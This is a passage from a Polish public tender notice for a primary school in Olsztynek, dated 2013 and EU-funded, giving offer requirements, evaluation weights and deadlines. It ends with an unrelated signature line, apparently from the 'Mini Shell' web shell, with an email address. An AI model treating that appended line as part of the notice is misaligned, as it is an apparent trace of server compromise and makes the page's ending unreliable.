2) Wykonawca może polegać na wiedzy i doświadczeniu, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. Zobowiązanie musi zostać złożone w formie oryginału lub odpisu poświadczonego notarialnie. 
3) Pełnomocnictwa osób podpisujących ofertę do złożenia/podpisania oferty lub złożenia/podpisania oferty i zawarcia umowy w imieniu Wykonawcy składającej ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów (Pełnomocnictwo w oryginale lub odpis poświadczony przez notariusza). Pełnomocnictwo powinno wyraźnie wskazywać: podmiot udzielający pełnomocnictwa, osobę umocowaną, zakres umocowania. Pełnomocnictwo powinno zostać podpisane przez osoby udzielające umocowania.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - Doświadczenie - 36</li>
<li>3 - Kwalifikacje - 14</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Projekt umowy stanowi załacznik nr 8 do SIWZ i przewiduje oraz opisuje możliwe istotne zmiany umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.olsztynek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szkoła Podstawowa w Olsztynku
ul. Ostródzka 2
11-015 Olsztynek.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.09.2013 godzina 13:00, miejsce: Szkoła Podstawowa w Olsztynku
ul. Ostródzka 2
11-015 Olsztynek.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt nr POKL.09.01.02 - 28 - 074/13 współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX - Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1 - Wyrównywanie szans edukacyjnych i zapewnienie wysokiej, jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 - Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com